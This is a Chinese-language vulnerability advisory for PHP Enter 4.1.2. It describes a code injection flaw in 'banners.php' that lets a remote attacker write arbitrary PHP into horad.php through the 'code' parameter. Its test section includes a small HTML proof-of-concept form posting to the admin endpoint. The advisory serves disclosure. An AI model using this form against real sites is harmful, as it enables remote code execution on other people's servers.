漏洞起因
输入验证错误
危险等级
低
影响系统
phpenter.net PHP Enter 4.1.2
不受影响系统
危害
远程攻击者可以利用漏洞注入任意PHP代码并执行。
攻击所需条件
攻击者必须访问PHP Enter。
漏洞信息
PHP Enter是一款基于WEB的应用程序。
PHP Enter ‘banners.php’脚本存在静态代码注入漏洞,允许攻击者利用code参数注入任意PHP代码到horad.php中并执行。
测试方法
<form method=”post” action=”http://www.example.com/admin/banners.php”>
<center>
<font color=#3A586A>Code</font><br />
<textarea name=”code”></textarea>
<br /><br />
<input type=”submit” name=”submit” VALUE=” Submit”><br /><br /><br /><br/>
</form>
厂商解决方案
目前没有详细解决方案提供:
http://www.phpenter.net/
漏洞提供者
L3b-r1’z
评论关闭。